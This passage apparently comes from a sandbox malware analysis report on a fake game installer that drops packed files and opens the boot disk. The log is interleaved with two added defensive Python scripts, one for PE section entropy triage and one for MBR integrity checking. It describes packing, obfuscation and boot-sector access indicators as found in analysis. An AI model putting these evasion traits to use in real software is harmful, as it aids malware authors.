Source: is-2Q15C.tmp.1.dr | Static PE information: section name: .didata
Source: is-HBA5G.tmp.1.dr | Static PE information: section name: (empty)
Source: is-HBA5G.tmp.1.dr | Static PE information: section name: (empty)
Source: is-HBA5G.tmp.1.dr | Static PE information: section name: petite
Source: is-UT63K.tmp.1.dr | Static PE information: section name: (empty)
Source: is-UT63K.tmp.1.dr | Static PE information: section name: petite
Source: is-3PB3G.tmp.1.dr | Static PE information: section name: (empty)
Source: is-3PB3G.tmp.1.dr | Static PE information: section name: (empty)
Source: is-3PB3G.tmp.1.dr | Static PE information: section name: (empty)
Source: is-O5AH5.tmp.1.dr | Static PE information: section name: (empty)
Source: is-O5AH5.tmp.1.dr | Static PE information: section name: (empty)
Source: is-O5AH5.tmp.1.dr | Static PE information: section name: petite
Source: is-2JFSM.tmp.1.dr | Static PE information: section name: (empty)
Source: is-2JFSM.tmp.1.dr | Static PE information: section name: (empty)
Source: is-2JFSM.tmp.1.dr | Static PE information: section name: (empty)
Source: is-H4RQI.tmp.1.dr | Static PE information: section name: (empty)
Source: is-H4RQI.tmp.1.dr | Static PE information: section name: (empty)
Source: is-H4RQI.tmp.1.dr | Static PE information: section name: petite
Source: is-MSL58.tmp.1.dr | Static PE information: section name: (empty)
Source: is-MSL58.tmp.1.dr | Static PE information: section name: (empty)
Source: is-MSL58.tmp.1.dr | Static PE information: section name: petite
Source: is-BLG4U.tmp.1.dr | Static PE information: section name: (empty)
Source: is-BLG4U.tmp.1.dr | Static PE information: section name: (empty)
Source: is-BLG4U.tmp.1.dr | Static PE information: section name: (empty)
Source: is-MDCMM.tmp.1.dr | Static PE information: section name: (empty)
Source: is-MDCMM.tmp.1.dr | Static PE information: section name: (empty)
Source: is-MDCMM.tmp.1.dr | Static PE information: section name: petite
Source: is-C09DN.tmp.1.dr | Static PE information: section name: /4
Source: is-5CFA9.tmp.1.dr | Static PE information: section name: /4
Source: is-CJ9O9.tmp.1.dr | Static PE information: section name: /4
Source: is-PKSJK.tmp.1.dr | Static PE information: section name: /4
Source: is-DC7IR.tmp.1.dr | Static PE information: section name: (empty)
Source: is-DC7IR.tmp.1.dr | Static PE information: section name: (empty)
Source: is-DC7IR.tmp.1.dr | Static PE information: section name: (empty)
Source: is-H36N8.tmp.1.dr | Static PE information: section name: /4
Source: is-TDV1O.tmp.1.dr | Static PE information: section name: .eh_fram
Source: is-UP2KF.tmp.1.dr | Static PE information: section name: asmcode
Source: is-41E97.tmp.1.dr | Static PE information: section name: .eh_fram
Source: is-RUH59.tmp.1.dr | Static PE information: section name: /4
Source: is-8CIMQ.tmp.1.dr | Static PE information: section name: /4
Source: is-RF28Q.tmp.1.dr | Static PE information: section name: /4
Source: SpaceXRaces.exe.5.dr | Static PE information: section name: .hsave
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_004065B8 push 004065F5h; ret | 0_2_004065ED
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_004040B5 push eax; ret | 0_2_004040F1
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax | 0_2_00408109
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00404185 push 00404391h; ret | 0_2_00404389
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00404206 push 00404391h; ret | 0_2_00404389
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_0040C218 push eax; ret | 0_2_0040C219
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_004042E8 push 00404391h; ret | 0_2_00404389
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00404283 push 00404391h; ret | 0_2_00404389
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret | 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00409954 push 00409991h; ret | 1_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040A04F push ds; ret | 1_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040A023 push ds; ret | 1_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax | 1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004822F4 push 004823D2h; ret | 1_2_004823CA
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx | 1_2_004765B1
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx | 1_2_004106E5
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00412938 push 0041299Bh; ret | 1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004589F0 push 00458A34h; ret | 1_2_00458A2C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx | 1_2_00442C98
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00450E58 push 00450E8Bh; ret | 1_2_00450E83
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax | 1_2_00451021
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx | 1_2_0040D03A
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx | 1_2_00493111
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004571B0 push 004571E8h; ret | 1_2_004571E0
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx | 1_2_0045F448
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040546D push eax; ret | 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040553D push 00405749h; ret | 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx | 1_2_0040F59A
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004055BE push 00405749h; ret | 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0040563B push 00405749h; ret | 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004056A0 push 00405749h; ret | 1_2_00405741
Source: crtgame.exe.1.dr | Static PE information: section name: .text entropy: 7.600836004242041
Source: is-3PB3G.tmp.1.dr | Static PE information: section name: (empty) entropy: 7.953893773659523
Source: is-2JFSM.tmp.1.dr | Static PE information: section name: (empty) entropy: 7.921519965168042
Source: is-MSL58.tmp.1.dr | Static PE information: section name: (empty) entropy: 7.966771808365004
Source: is-BLG4U.tmp.1.dr | Static PE information: section name: (empty) entropy: 7.950928332152424
Source: is-DC7IR.tmp.1.dr | Static PE information: section name: (empty) entropy: 7.491817342209834
Source: SpaceXRaces.exe.5.dr | Static PE information: section name: .text entropy: 7.600836004242041
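Every static observation in the Data Obfuscation block above (entry point in a section named petite, nameless sections, the writable-and-executable .hsave section seen in the unpacked crtgame.exe, section entropies close to 8 bits per byte) comes straight from the PE section table, so an analyst can reproduce them on the dropped files without the sandbox. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the section table with the standard library only, computes per-section Shannon entropy and reports the same classes of finding. The image it runs on by default is constructed in memory for the demo; its section names, sizes and entry point are assumed values rather than data from any dropped file. Pass a path to a real file such as crtgame.exe or is-V3CB3.tmp to run the identical checks on it.

```python
"""Static PE section triage (added example, not part of the report).
Reproduces the Data Obfuscation checks: nameless sections, a 'petite' packer
section, writable+executable sections (the .hsave:EW observation), high
per-section entropy, and an entry point outside .text. Stdlib only."""
import math
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}


def shannon_entropy(buf):
    """Bits per byte; 8.0 means uniform (typical of packed or encrypted data)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]   # SizeOfOptionalHeader
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        raw_name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = \
            struct.unpack_from(SECTION_HDR, pe, opt + opt_size + 40 * i)
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "vaddr": vaddr, "size": max(vsize, rawsize), "flags": flags,
                         "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def triage_pe(pe, entropy_threshold=7.0):
    """Return the entry point RVA, the parsed sections and a list of finding strings."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    for s in sections:
        label = s["name"] or "<nameless>"
        if not s["name"]:
            findings.append(f"{label}: nameless section")
        elif s["name"].lower() == "petite":
            findings.append(f"{label}: Petite packer section")
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append(f"{label}: non-standard section name")
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{label}: writable and executable (EW)")
        if s["entropy"] >= entropy_threshold:
            findings.append(f"{label}: high entropy {s['entropy']:.2f}")
        if s["vaddr"] <= entry_rva < s["vaddr"] + s["size"] and s["name"] != ".text":
            findings.append(f"{label}: entry point 0x{entry_rva:x} lies here, not in .text")
    return {"entry_rva": entry_rva, "sections": sections, "findings": findings}


def build_pe(sections, entry_rva):
    """Assemble a minimal PE32 image (DOS stub, COFF, optional header, section
    table, raw data). Constructed for the demo only; it is not loadable."""
    hdr_end = 0x40 + 4 + 20 + 224 + 40 * len(sections)
    raw_base = (hdr_end + 0x1FF) & ~0x1FF
    table, blobs = b"", b""
    for name, data, flags, vaddr in sections:
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(data), vaddr,
                             len(data), raw_base + len(blobs), 0, 0, 0, 0, flags)
        blobs += data.ljust((len(data) + 0x1FF) & ~0x1FF, b"\0")
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva).ljust(224, b"\0")
    return (dos + coff + opt + table).ljust(raw_base, b"\0") + blobs


# Constructed sample (assumed layout, not the analysed binary): a nameless
# high-entropy section, a benign .data section, and an EW 'petite' stub that
# holds the entry point, mirroring what the report lists for the dropped files.
UNIFORM_BLOB = bytes(range(256)) * 16  # every byte value equally often: entropy 8.0
SAMPLE_PE = build_pe([
    (b"", UNIFORM_BLOB, IMAGE_SCN_MEM_READ, 0x1000),
    (b".data", b"\0" * 4096, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x3000),
    (b"petite", b"\xE8\0\0\0\0" * 64,
     IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x4000),
], entry_rva=0x4010)

if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PE
    result = triage_pe(image)
    for s in result["sections"]:
        print(f"{s['name'] or '<nameless>':<10} rva=0x{s['vaddr']:06x} "
              f"entropy={s['entropy']:.3f} flags=0x{s['flags']:08x}")
    for finding in result["findings"]:
        print("!", finding)
```

The entropy threshold of 7.0 is a working value chosen here; the report's own figures for the petite-packed droppers sit between 7.49 and 7.97, and a section that is both executable and writable at load time is what the unpacking signature above records as `.hsave:EW`.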

                  Persistence and Installation Behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 7_2_02A3F29C
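The two entries above are what the "infect the boot sector" signature fires on: crtgame.exe opens \\.\PhysicalDrive0 with CreateFileA and issues a DeviceIoControl against it. The same call pair is also how a program queries disk properties such as the serial number, and the report records no write to the device, so on its own it does not prove the MBR was modified. The check a responder wants on an affected host is to read the first sector and compare it with a known-good baseline. The Python below is an added example, not part of the Joe Sandbox report or of the sample; the two 512-byte sectors it works on are constructed in the code, and the partition layout, disk signature and baseline hash are assumed values.

```python
"""MBR integrity check (added example, not from the report).
Parses a 512-byte master boot record, validates the 0x55AA signature,
lists the partition table and compares the boot-code hash with a
known-good baseline recorded before the sample ran."""
import hashlib
import struct

PART_ENTRY = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    if len(sector) != 512:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(PART_ENTRY, sector, 446 + 16 * i)
        if ptype:  # partition type 0 marks an unused slot
            parts.append({"slot": i, "bootable": status == 0x80, "type": ptype,
                          "lba_start": lba, "sectors": count})
    return {"bootcode_sha256": hashlib.sha256(sector[:440]).hexdigest(),
            "disk_signature": struct.unpack_from("<I", sector, 440)[0],
            "partitions": parts}


def check_mbr(sector, baseline_bootcode_sha256):
    """Return a list of deviations; an empty list means the MBR matches the baseline."""
    info = parse_mbr(sector)
    issues = []
    if info["bootcode_sha256"] != baseline_bootcode_sha256:
        issues.append("boot code (bytes 0-439) differs from baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        issues.append(f"expected one active partition, found {len(bootable)}")
    for p in info["partitions"]:
        if p["lba_start"] == 0 or p["sectors"] == 0:
            issues.append(f"partition slot {p['slot']} has a zero LBA start or length")
    return issues


def _partition(status, ptype, lba, count):
    return struct.pack(PART_ENTRY, status, b"\0\0\0", ptype, b"\0\0\0", lba, count)


# Constructed sectors (assumed values, not taken from the analysed host): a clean
# MBR with one active NTFS partition, and the same MBR with its first instruction
# patched, which is the kind of change a boot-code overwrite produces.
CLEAN_MBR = (b"\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 433   # 440 bytes of boot code
             + struct.pack("<I", 0xDEADBEEF) + b"\0\0"         # disk signature + reserved
             + _partition(0x80, 0x07, 2048, 1_000_000)
             + _partition(0x00, 0x00, 0, 0) * 3
             + b"\x55\xAA")
CLEAN_BASELINE = hashlib.sha256(CLEAN_MBR[:440]).hexdigest()
TAMPERED_MBR = b"\xEA\x00\x7C\x00\x00" + CLEAN_MBR[5:]          # far jump replaces the original code

if __name__ == "__main__":
    # On the affected host, from an administrator shell: read 512 bytes from
    # r"\\.\PhysicalDrive0" and pass them to check_mbr with the baseline hash.
    print("clean   :", check_mbr(CLEAN_MBR, CLEAN_BASELINE) or "matches baseline")
    print("tampered:", check_mbr(TAMPERED_MBR, CLEAN_BASELINE))
```

The hash covers only bytes 0 to 439 because the disk signature and partition table that follow legitimately change when volumes are added or removed; those fields are validated structurally instead. The baseline has to come from an image taken before the sample ran, or from an identical clean build, since a bootkit that rewrites the code would otherwise define its own baseline.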
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-TF38E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RDHKR.tmp
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | File created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UP2KF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UJQGJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-TDV1O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4IVEL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-R8DJL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\crtgame.exe
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)
